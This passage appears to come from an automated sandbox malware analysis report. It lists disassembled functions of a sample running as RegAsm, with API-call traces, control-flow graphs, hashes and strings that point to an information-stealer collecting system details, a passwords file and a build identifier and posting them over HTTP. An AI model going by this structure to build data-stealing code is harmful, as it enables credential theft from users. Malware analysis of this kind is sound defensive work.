                                                                                                                                                                                                                                                                    • Part of subcall function 004100B9: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,004262C7,00000001,00000000), ref: 00410106
                                                                                                                                                                                                                                                                    • Part of subcall function 004100B9: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00410150
                                                                                                                                                                                                                                                                    • Part of subcall function 004100B9: wsprintfA.USER32 ref: 0041017A
                                                                                                                                                                                                                                                                    • Part of subcall function 004100B9: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 00410197
                                                                                                                                                                                                                                                                    • Part of subcall function 004100B9: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 004101C1
                                                                                                                                                                                                                                                                    • Part of subcall function 004100B9: lstrlenA.KERNEL32(?), ref: 004101D6
                                                                                                                                                                                                                                                                    • Part of subcall function 004100B9: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,00000000,?,?,00000000,?,004262F0), ref: 00410256
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,?,00426738,00000000,?,00000000,00000000,?,00000000,00000000,?,[Software],00000000,?,00426728), ref: 00415478
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: _EH_prolog.MSVCRT ref: 0041451E
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: CreateThread.KERNEL32(00000000,00000000,0041331B,?,00000000,00000000), ref: 004145C4
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004145CC
                                                                                                                                                                                                                                                                    • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Heap$H_prolog$Process$Alloc$wsprintf$CreateOpen$InitializeQueryValuelstrcpy$InformationLocalNamelstrlen$BlanketCapsCloseCurrentDeviceEnumHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariantlstrcat$CharComputerDevicesDirectoryDisplayFileFirstFreeGlobalLocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZonememset
                                                                                                                                                                                                                                                                  • String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $U$User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                                                                                                                                                                                                                  • API String ID: 722754166-3657450861
                                                                                                                                                                                                                                                                  • Opcode ID: a37c958319b456512c2c18d4d406cbd480eb3c9c5089317152751ee4f4775006
                                                                                                                                                                                                                                                                  • Instruction ID: 084949f72d481bf670e70f269b8f8bc486b787bf6dde41fe46f753e6acbf2686
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a37c958319b456512c2c18d4d406cbd480eb3c9c5089317152751ee4f4775006
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AD921871900249EACB15E7E5C956BEEBBB85F25308F2401BFA106735C2DE781B4CCBA5
                                                                                                                                                                                                                                                                  Function 0040C2CF Relevance: 42.3, APIs: 23, Strings: 1, Instructions: 296stringmemoryfileCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0040C2D4
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 00410B42: _EH_prolog.MSVCRT ref: 00410B47
                                                                                                                                                                                                                                                                    • Part of subcall function 00410B42: GetSystemTime.KERNEL32(?,00426488,00000001,000000C8,00000000,004265AA), ref: 00410B87
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,00425BA4,?,?,?,00425B9E,?,00000000), ref: 0040C3CC
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040C42D
                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0040C434
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000), ref: 0040C4C4
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000), ref: 0040C4DB
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0040C4ED
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00425BA8), ref: 0040C4FB
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0040C50D
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00425BAC), ref: 0040C51B
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000), ref: 0040C52A
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0040C53C
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00425BB0), ref: 0040C54A
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000), ref: 0040C559
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0040C56B
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00425BB4), ref: 0040C579
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000), ref: 0040C588
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0040C59A
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00425BB8), ref: 0040C5A8
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00425BBC), ref: 0040C5B6
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040C5EA
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040C63D
                                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 0040C66A
                                                                                                                                                                                                                                                                    • Part of subcall function 00406404: _EH_prolog.MSVCRT ref: 00406409
                                                                                                                                                                                                                                                                    • Part of subcall function 00406404: memcmp.MSVCRT ref: 0040642F
                                                                                                                                                                                                                                                                    • Part of subcall function 00406404: memset.MSVCRT ref: 0040645E
                                                                                                                                                                                                                                                                    • Part of subcall function 00406404: LocalAlloc.KERNEL32(00000040,-000000E1,?,?,?,?,00000000,00000000), ref: 00406493
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: lstrcat$H_prolog$lstrcpy$lstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessSystemTimememcmp
                                                                                                                                                                                                                                                                  • String ID: passwords.txt
                                                                                                                                                                                                                                                                  • API String ID: 3298853120-347816968
                                                                                                                                                                                                                                                                  • Opcode ID: 5ca54d99d1dc71661ff9b0597fef4a06f0d8dea582975d082b299193c2294389
                                                                                                                                                                                                                                                                  • Instruction ID: 5039f940fe929ccddf74de6384bec7bd9bf62152e733e19329f64eb0cdf267ee
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5ca54d99d1dc71661ff9b0597fef4a06f0d8dea582975d082b299193c2294389
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D0C16A71804119EFDB05EBA4DD5AAEEBB75BF19308F10403AF516B21E2DB381A08CB65
                                                                                                                                                                                                                                                                  Function 00413901 Relevance: 41.1, APIs: 12, Strings: 11, Instructions: 899sleepCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 2054 413901-4139ba _EH_prolog call 4135a1 call 40f9de * 3 call 40f96a * 6 2075 4139be-4139c5 call 4022a7 2054->2075 2078 4139cb-413a69 call 402121 call 40fa28 call 40f9d5 call 402155 call 40f9a1 * 2 call 4010b1 call 413020 call 40fa28 2075->2078 2079 413a6e-413aef call 402121 call 40213b call 4010b1 call 41310d call 40fa28 call 40f9d5 call 40fb94 StrCmpCA 2075->2079 2122 413b66-413b6a call 40f9d5 2078->2122 2108 413af1-413b48 call 402155 call 40f9a1 * 2 call 4010b1 call 413020 2079->2108 2109 413b6f-413b85 call 40fb94 StrCmpCA 2079->2109 2149 413b4d-413b60 call 40fa28 2108->2149 2118 413b8b-413b92 call 4022aa 2109->2118 2119 41443d-41449f call 40fa28 call 402155 call 40fa28 call 40f9d5 call 4022ae call 40fa28 call 40f9d5 call 4132ce 2109->2119 2131 413d46-413d5c call 40fb94 StrCmpCA 2118->2131 2132 413b98-413b9f call 4022a7 2118->2132 2214 4144a4-414518 call 40f9d5 * 6 call 41328a call 401061 2119->2214 2122->2109 2145 413d62-413d69 call 4022a7 2131->2145 2146 4143f5-414438 call 40fa28 call 4021a3 call 40fa28 call 40f9d5 call 4022c8 2131->2146 2141 413c45-413cc6 call 40216f call 402189 call 4010b1 call 41310d call 40fa28 call 40f9d5 call 40fb94 StrCmpCA 2132->2141 2142 413ba5-413c40 call 40216f call 40fa28 call 40f9d5 call 4021a3 call 40f9a1 call 40216f call 4010b1 call 413020 call 40fa28 2132->2142 2141->2131 2270 413cc8-413d37 call 4021a3 call 40f9a1 * 2 call 4010b1 call 413020 call 40fa28 2141->2270 2320 413d3d-413d41 call 40f9d5 2142->2320 2159 413f1d-413f33 call 40fb94 StrCmpCA 2145->2159 2160 413d6f-413d76 call 4022a7 2145->2160 2223 4143a2-4143ae call 40fa28 2146->2223 2149->2122 2181 4143b0-4143f3 call 40fa28 call 4021f1 call 40fa28 call 40f9d5 call 4022e2 2159->2181 2182 413f39-413f40 call 4022a7 2159->2182 2178 413e1c-413e9d call 4021bd call 4021d7 call 4010b1 call 41310d call 40fa28 call 40f9d5 call 40fb94 StrCmpCA 2160->2178 2179 413d7c-413e17 call 4021bd call 40fa28 call 40f9d5 call 4021f1 call 40f9a1 call 4021bd call 4010b1 call 413020 call 40fa28 2160->2179 2178->2159 2332 413e9f-413f0e call 4021f1 call 40f9a1 * 2 call 4010b1 call 413020 call 40fa28 2178->2332 2376 413f14-413f18 call 40f9d5 2179->2376 2181->2223 2208 4140f4-41410a call 40fb94 StrCmpCA 2182->2208 2209 413f46-413f4d call 4022a7 2182->2209 2229 414110-414117 call 4022a7 2208->2229 2230 41435f-41439e call 40fa28 call 40223f call 40fa28 call 40f9d5 call 4022fc 2208->2230 2237 413ff3-414074 call 40220b call 402225 call 4010b1 call 41310d call 40fa28 call 40f9d5 call 40fb94 StrCmpCA 2209->2237 2238 413f53-413fee call 40220b call 40fa28 call 40f9d5 call 40223f call 40f9a1 call 40220b call 4010b1 call 413020 call 40fa28 2209->2238 2259 414342-41435a call 40f9d5 call 4132ce 2223->2259 2266 4142c5-4142db call 40fb94 StrCmpCA 2229->2266 2267 41411d-414124 call 4022a7 2229->2267 2230->2223 2237->2208 2394 414076-4140e5 call 40223f call 40f9a1 * 2 call 4010b1 call 413020 call 40fa28 2237->2394 2416 4140eb-4140ef call 40f9d5 2238->2416 2259->2214 2303 4142ed-41433c call 40fa28 call 40228d call 40fa28 call 40f9d5 call 402316 call 40fa28 2266->2303 2304 4142dd-4142e8 Sleep 2266->2304 2300 4141ca-41424b call 402259 call 402273 call 4010b1 call 41310d call 40fa28 call 40f9d5 call 40fb94 StrCmpCA 2267->2300 2301 41412a-4141c5 call 402259 call 40fa28 call 40f9d5 call 40228d call 40f9a1 call 402259 call 4010b1 call 413020 call 40fa28 2267->2301 2270->2320 2300->2266 2426 41424d-4142b9 call 40228d call 40f9a1 * 2 call 4010b1 call 413020 call 40fa28 2300->2426 2437 4142bc-4142c0 call 40f9d5 2301->2437 2303->2259 2304->2075 2320->2131 2332->2376 2376->2159 2394->2416 2416->2208 2426->2437 2437->2266
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00413906
                                                                                                                                                                                                                                                                    • Part of subcall function 004135A1: _EH_prolog.MSVCRT ref: 004135A6
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9DE: lstrlenA.KERNEL32(?,00000000,?,00416ABD,004265A7,004265A6,00000000,00000000,?,0041740F), ref: 0040F9E7
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9DE: lstrcpy.KERNEL32(00000000,00000000), ref: 0040FA1B
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413AE7
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413B7D
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 00413020: _EH_prolog.MSVCRT ref: 00413025
                                                                                                                                                                                                                                                                    • Part of subcall function 00413020: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413083
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413CBE
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413D54
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413E95
                                                                                                                                                                                                                                                                    • Part of subcall function 0041310D: _EH_prolog.MSVCRT ref: 00413112
                                                                                                                                                                                                                                                                    • Part of subcall function 0041310D: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413194
                                                                                                                                                                                                                                                                    • Part of subcall function 0041310D: lstrlenA.KERNEL32(00000000), ref: 004131AB
                                                                                                                                                                                                                                                                    • Part of subcall function 0041310D: StrStrA.SHLWAPI(00000000,00000000), ref: 004131D2
                                                                                                                                                                                                                                                                    • Part of subcall function 0041310D: lstrlenA.KERNEL32(00000000), ref: 004131E7
                                                                                                                                                                                                                                                                    • Part of subcall function 0041310D: lstrlenA.KERNEL32(00000000), ref: 00413202
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413F2B
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041406C
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414102
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414243
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004142D3
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(0000EA60), ref: 004142E2
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prolog$lstrcpylstrlen$Sleep
                                                                                                                                                                                                                                                                  • String ID: "$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                                                                                                                                                                  • API String ID: 1345713276-2213018930
                                                                                                                                                                                                                                                                  • Opcode ID: 5793459f1ce6a6155bc0141a22958bc4342ee1167dccd2cc3fc08a2415e947eb
                                                                                                                                                                                                                                                                  • Instruction ID: 291830e9c0d6a4c21866d3242d3091a89a819cf3206b8c797f042e9aa0e73688
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5793459f1ce6a6155bc0141a22958bc4342ee1167dccd2cc3fc08a2415e947eb
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A723170D00248EADB11EBE9D946BDDBBB85F15308F1440BFF445B3682DA785B4C8BA6
                                                                                                                                                                                                                                                                  Function 00403B1E Relevance: 37.3, APIs: 13, Strings: 8, Instructions: 513networkstringfileCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 2450 403b1e-403bed _EH_prolog call 40f9a1 call 403a7d call 40f96a * 5 call 40fb94 InternetOpenA StrCmpCA 2467 403bf1-403bf4 2450->2467 2468 403bef 2450->2468 2469 403bfa-403d78 call 410b42 call 40fa6f call 40fa28 call 40f9d5 * 2 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fa6f call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa6f call 40fa28 call 40f9d5 * 2 InternetConnectA 2467->2469 2470 40414b-4041da InternetCloseHandle call 410a7a * 2 call 40f9d5 * 8 2467->2470 2468->2467 2469->2470 2541 403d7e-403db1 HttpOpenRequestA 2469->2541 2542 404142-404145 InternetCloseHandle 2541->2542 2543 403db7-403db9 2541->2543 2542->2470 2544 403dd1-4040dc call 40fae3 call 40fa28 call 40f9d5 call 40fa6f call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fa6f call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fa6f call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fae3 call 40fa28 call 40f9d5 call 40fa6f call 40fa28 call 40f9d5 call 40f96a call 40fa6f * 2 call 40fa28 call 40f9d5 * 2 call 40fb94 lstrlenA call 40fb94 * 2 lstrlenA call 40fb94 HttpSendRequestA 2543->2544 2545 403dbb-403dcb InternetSetOptionA 2543->2545 2656 404118-40412d InternetReadFile 2544->2656 2545->2544 2657 4040de-4040e3 2656->2657 2658 40412f-40413d InternetCloseHandle call 40f9d5 2656->2658 2657->2658 2660 4040e5-404113 call 40fae3 call 40fa28 call 40f9d5 2657->2660 2658->2542 2660->2656
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00403B23
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: _EH_prolog.MSVCRT ref: 00403A82
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: ??_U@YAPAXI@Z.MSVCRT ref: 00403AB4
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: ??_U@YAPAXI@Z.MSVCRT ref: 00403ABD
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: ??_U@YAPAXI@Z.MSVCRT ref: 00403AC6
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AE0
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AF0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00403BCE
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 00403BE5
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                  • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00403D6D
                                                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 00403DA7
                                                                                                                                                                                                                                                                  • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00403DCB
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,004259CD,00000000,?,?,00000000,?,",00000000,?,build_id), ref: 004040A7
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 004040C0
                                                                                                                                                                                                                                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004040D1
                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404125
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00404130
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00404145
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 0040414E
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
